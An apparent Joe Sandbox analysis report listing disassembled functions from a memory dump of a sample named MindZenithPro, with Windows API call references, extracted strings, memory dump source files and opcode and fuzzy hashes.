                                    • API ID: Cursor$Load$ErrorInfoLast
                                    • String ID:
                                    • API String ID: 3215588206-0
                                    • Opcode ID: 13842f6d5d053254654e1ba76f0d31534d57067fa04c587c9fa58a9c49a7488d
                                    • Instruction ID: 67614934253069496aa811ca07fcb260db1bf80b9fe853a5fd9d9ebd23cf0d05
                                    • Opcode Fuzzy Hash: 13842f6d5d053254654e1ba76f0d31534d57067fa04c587c9fa58a9c49a7488d
                                    • Instruction Fuzzy Hash: 644142B0D083196ADB109FBA8C89C5EBFE8FF44354B50452AE11DEB291DB78D901CF95
                                    Function 004237D8 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$kH
                                    • API String ID: 176396367-1199548463
                                    • Opcode ID: 7b99527d81c362c0dc9c337f09fbfe7c81617f7be7cd864ca6e0ed86d7135179
                                    • Instruction ID: 74f5033d6a3c7ac11c148bb0326d9af357f33034fd6cac0e06f1f67e0e7ba277
                                    • Opcode Fuzzy Hash: 7b99527d81c362c0dc9c337f09fbfe7c81617f7be7cd864ca6e0ed86d7135179
                                    • Instruction Fuzzy Hash: 6DE1C332B005359ACB14EF64D481BEEFBB0BF14711F90852BE456EB251DB3CAE858B94
                                    Function 003E0416 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                    Download Yara Rule
                                    APIs
                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003E0416
                                      • Part of subcall function 003E043D: InitializeCriticalSectionAndSpinCount.KERNEL32(004916FC,00000FA0,C81476EA,?,?,?,?,00402703,000000FF), ref: 003E046C
                                      • Part of subcall function 003E043D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00402703,000000FF), ref: 003E0477
                                      • Part of subcall function 003E043D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00402703,000000FF), ref: 003E0488
                                      • Part of subcall function 003E043D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003E049E
                                      • Part of subcall function 003E043D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003E04AC
                                      • Part of subcall function 003E043D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003E04BA
                                      • Part of subcall function 003E043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003E04E5
                                      • Part of subcall function 003E043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003E04F0
                                    • ___scrt_fastfail.LIBCMT ref: 003E0437
                                      • Part of subcall function 003E03F3: __onexit.LIBCMT ref: 003E03F9
                                    Strings
                                    • InitializeConditionVariable, xrefs: 003E0498
                                    • WakeAllConditionVariable, xrefs: 003E04B2
                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003E0472
                                    • SleepConditionVariableCS, xrefs: 003E04A4
                                    • kernel32.dll, xrefs: 003E0483
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                    • API String ID: 66158676-1714406822
                                    • Opcode ID: e349c533c15146c1c895f9f137caf73e0fdd3ed9d6c81af9bc1471c130ae5599
                                    • Instruction ID: 2ec830210aec9a7f49a64a7d3c5e2c317301a6a48497a0d0197904bba8a9d70c
                                    • Opcode Fuzzy Hash: e349c533c15146c1c895f9f137caf73e0fdd3ed9d6c81af9bc1471c130ae5599
                                    • Instruction Fuzzy Hash: 97213E32A447626BD7262BB6AC45B6A3794DF05F52F100336F501972D1DFF8DC808E99
                                    Function 00434C2F Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(00000000,00000000,0045DC1C), ref: 00434C96
                                    • _wcslen.LIBCMT ref: 00434CAA
                                    • _wcslen.LIBCMT ref: 00434D08
                                    • _wcslen.LIBCMT ref: 00434D63
                                    • _wcslen.LIBCMT ref: 00434DAE
                                    • _wcslen.LIBCMT ref: 00434E16
                                      • Part of subcall function 003DFD18: _wcslen.LIBCMT ref: 003DFD23
                                    • GetDriveTypeW.KERNEL32(?,00487C00,00000061), ref: 00434EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharDriveLowerType
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2055661098-1000479233
                                    • Opcode ID: 78d0d8a6c52e34327984b0e01969e4886896a91232cb4a0890960cb0c5b28920
                                    • Instruction ID: a6b194d8b2e6568149a0001e1d91d74396b9e2d480027ec88466f651c9daa753
                                    • Opcode Fuzzy Hash: 78d0d8a6c52e34327984b0e01969e4886896a91232cb4a0890960cb0c5b28920
                                    • Instruction Fuzzy Hash: 46B1AE316083029BC710DF28C891AABB7E5BFE8724F60591EF496C7291D738E845CB96
                                    Function 0044B780 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 0044B91F
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0044B937
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0044B95B
                                    • _wcslen.LIBCMT ref: 0044B987
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0044B99B
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0044B9BD
                                    • _wcslen.LIBCMT ref: 0044BAB9
                                      • Part of subcall function 00430C78: GetStdHandle.KERNEL32(000000F6), ref: 00430C97
                                    • _wcslen.LIBCMT ref: 0044BAD2
                                    • _wcslen.LIBCMT ref: 0044BAED
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0044BB3D
                                    • GetLastError.KERNEL32(00000000), ref: 0044BB8E
                                    • CloseHandle.KERNEL32(?), ref: 0044BBC0
                                    • CloseHandle.KERNEL32(00000000), ref: 0044BBD1
                                    • CloseHandle.KERNEL32(00000000), ref: 0044BBE3
                                    • CloseHandle.KERNEL32(00000000), ref: 0044BBF5
                                    • CloseHandle.KERNEL32(?), ref: 0044BC6A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                    • String ID:
                                    • API String ID: 2178637699-0
                                    • Opcode ID: e647149a95f63fa252173c9e596b3551e12f339dc0e14fc38fa3dbd67d9c684b
                                    • Instruction ID: 63bfe379a7ef6b57cd4345ece6d4cc6dad9ca4beedb643d61cfdacc79e239f0a
                                    • Opcode Fuzzy Hash: e647149a95f63fa252173c9e596b3551e12f339dc0e14fc38fa3dbd67d9c684b
                                    • Instruction Fuzzy Hash: 5DF199715083409FDB15EF25C891B2ABBE5EF84310F18895EF8858F2A2CB75EC41CB96
                                    Function 00444770 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0045DC1C), ref: 00444842
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00444854
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0045DC1C), ref: 00444879
                                    • FreeLibrary.KERNEL32(00000000,?,0045DC1C), ref: 004448C5
                                    • StringFromGUID2.OLE32(?,?,00000028,?,0045DC1C), ref: 0044492F
                                    • SysFreeString.OLEAUT32(00000009), ref: 004449E9
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00444A4F
                                    • SysFreeString.OLEAUT32(?), ref: 00444A79
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 354098117-199464113
                                    • Opcode ID: aa6d59fd5895b9c87375f5e19621d03dbabd8194eea896d85090be73b768d2bc
                                    • Instruction ID: 278b7e2d63e63cd9d95b15fd56d63aa2b13fd73a055f4beb16592eaa2dad7fea
                                    • Opcode Fuzzy Hash: aa6d59fd5895b9c87375f5e19621d03dbabd8194eea896d85090be73b768d2bc
                                    • Instruction Fuzzy Hash: 6E124A75A00205AFEB14DF94C884FAEB7B5FF85314F258099E805AB251CB35ED42CBA4
                                    Function 003C30A2 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemCount.USER32(004929B0), ref: 00403202
                                    • GetMenuItemCount.USER32(004929B0), ref: 004032B2
                                    • GetCursorPos.USER32(?), ref: 004032F6
                                    • SetForegroundWindow.USER32(00000000), ref: 004032FF
                                    • TrackPopupMenuEx.USER32(004929B0,00000000,?,00000000,00000000,00000000), ref: 00403312
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040331E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                    • String ID: 0
                                    • API String ID: 36266755-4108050209
                                    • Opcode ID: 5f7db0d7bc5d4c75e44885b563519fe88280cf3a829c9ce0d3e596fc1c0eda3f
                                    • Instruction ID: 63ce6a56c9dddf278ba538149d26f5b9b97b1b8125f19f232a9961dbbee46e2f
                                    • Opcode Fuzzy Hash: 5f7db0d7bc5d4c75e44885b563519fe88280cf3a829c9ce0d3e596fc1c0eda3f
                                    • Instruction Fuzzy Hash: C2712631600215BEEB218F24CC49FAABF68FF09355F14422BF515AA2E1C7B59E10C758
                                    Function 004573A4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(00000000,?), ref: 004574B6
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0045752A
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0045754C
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0045755F
                                    • DestroyWindow.USER32(?), ref: 00457580
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003C0000,00000000), ref: 004575AF
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004575C8
                                    • GetDesktopWindow.USER32 ref: 004575E1
                                    • GetWindowRect.USER32(00000000), ref: 004575E8
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00457600
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00457618
                                      • Part of subcall function 003D9B74: GetWindowLongW.USER32(?,000000EB), ref: 003D9B82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 2429346358-3619404913
                                    • Opcode ID: 5c9d587099af6563fc7cbd9aa6812ae1e422b7ea0f27534ac8249abade3f3678
                                    • Instruction ID: 5bbe7d78515435e9ec13f1f1f65f256a1affe8fa32e16b104ef84edb11bbb35e
                                    • Opcode Fuzzy Hash: 5c9d587099af6563fc7cbd9aa6812ae1e422b7ea0f27534ac8249abade3f3678
                                    • Instruction Fuzzy Hash: E3717BB0504345AFD721CF18D848FABBBE9FB88315F04082EF98587262D774E906CB1A
                                    Function 0045980A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • DragQueryPoint.SHELL32(?,?), ref: 00459833
                                      • Part of subcall function 00457D3F: ClientToScreen.USER32(?,?), ref: 00457D65
                                      • Part of subcall function 00457D3F: GetWindowRect.USER32(?,?), ref: 00457DDB
                                      • Part of subcall function 00457D3F: PtInRect.USER32(?,?,00459275), ref: 00457DEB
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0045989C
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004598A7
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004598CA
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00459911
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0045992A
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00459941
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00459963
                                    • DragFinish.SHELL32(?), ref: 0045996A
                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00459A5D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 221274066-3440237614
                                    • Opcode ID: 0603d2a627c052e895db03a10629d803837ceacc4396a42c6a29ee581ec722cb
                                    • Instruction ID: 81b72f9a577676c3547f8eec35e51990478f362788f4f0b7f3caffc853c4913f
                                    • Opcode Fuzzy Hash: 0603d2a627c052e895db03a10629d803837ceacc4396a42c6a29ee581ec722cb
                                    • Instruction Fuzzy Hash: B961A071508305AFC712EF60DC85E9FBBE8EF89315F00092EF991961A1DB70EA49CB56
                                    Function 003D8EF2 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003D8F0D,?,00000000,?,?,?,?,003D8EDF,00000000,?), ref: 003D92EA
                                    • DestroyWindow.USER32(?), ref: 003D8FA6
                                    • KillTimer.USER32(00000000,?,?,?,?,003D8EDF,00000000,?), ref: 003D9040
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00417019
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,003D8EDF,00000000,?), ref: 00417047
                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,003D8EDF,00000000,?), ref: 0041705E
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003D8EDF,00000000), ref: 0041707A
                                    • DeleteObject.GDI32(00000000), ref: 0041708C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID: ,)I
                                    • API String ID: 641708696-2236612681
                                    • Opcode ID: 39e78fc2eb9956c6978185c3bc4607649d17ca979be9d8a9125a3cb566562fd7
                                    • Instruction ID: 4443f67ea0a0122b1ee6a0e9386db1aa586b47d83c2219c7ca08a9dfcf5ec84c
                                    • Opcode Fuzzy Hash: 39e78fc2eb9956c6978185c3bc4607649d17ca979be9d8a9125a3cb566562fd7
                                    • Instruction Fuzzy Hash: CB618D72505701EFDB369F14EA48B6A7BB6FF54316F10452BE0428AB60C7B4B881DB88
                                    Function 0043CBE5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0043CC1F
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0043CC32
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0043CC46
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0043CC5F
                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0043CCA2
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0043CCB8
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0043CCC3
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0043CCF3
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0043CD4B
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0043CD5F
                                    • InternetCloseHandle.WININET(00000000), ref: 0043CD6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                    • String ID:
                                    • API String ID: 3800310941-3916222277
                                    • Opcode ID: 8fdb030edf7ae090e0244ede84d74ebe24a1ac45abb889239a71e219cc7f112a
                                    • Instruction ID: 16a95f2bb53388aff72ee7423aed23713f3cabb5bdec4a1034adf9866b74bee0
                                    • Opcode Fuzzy Hash: 8fdb030edf7ae090e0244ede84d74ebe24a1ac45abb889239a71e219cc7f112a
                                    • Instruction Fuzzy Hash: 4E518FB1900708BFEB219F61C888AAB7BBCFF0C745F10542AF945E6251D738D944DBA5
                                    Function 00458C5B Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004563F7,?,?), ref: 00458C7E
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004563F7,?,?,00000000,?), ref: 00458C8E
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004563F7,?,?,00000000,?), ref: 00458C99
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,004563F7,?,?,00000000,?), ref: 00458CA6
                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,004563F7,?,?,00000000,?), ref: 00458CB4
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004563F7,?,?,00000000,?), ref: 00458CC3
                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,004563F7,?,?,00000000,?), ref: 00458CCC
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,004563F7,?,?,00000000,?), ref: 00458CD3
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004563F7,?,?,00000000,?), ref: 00458CE4
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00460C20,?), ref: 00458CFD
                                    • GlobalFree.KERNEL32(00000000), ref: 00458D0D
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00458D2D
                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00458D5D
                                    • DeleteObject.GDI32(00000000), ref: 00458D85
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00458D9B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: 30c704f03e1601a41897c7239c8fb302758d45a1f99fe48dfdc034eb59e93a6a
                                    • Instruction ID: 165f5a8f163730a51e5bd0fc77b147b971e6d93947c270d69ccc9dee6b1c6197
                                    • Opcode Fuzzy Hash: 30c704f03e1601a41897c7239c8fb302758d45a1f99fe48dfdc034eb59e93a6a
                                    • Instruction Fuzzy Hash: 5D413A75A00208BFDB219F65DC48EAB7BB9FF89712F104069F906E72A1DB34D945CB24
                                    Function 00431BA6 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 00431BEB
                                    • VariantCopy.OLEAUT32(?,?), ref: 00431BF4
                                    • VariantClear.OLEAUT32(?), ref: 00431C00
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00431CE4
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00431D40
                                    • VariantInit.OLEAUT32(?), ref: 00431DF1
                                    • SysFreeString.OLEAUT32(?), ref: 00431E75
                                    • VariantClear.OLEAUT32(?), ref: 00431EC1
                                    • VariantClear.OLEAUT32(?), ref: 00431ED0
                                    • VariantInit.OLEAUT32(00000000), ref: 00431F0C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
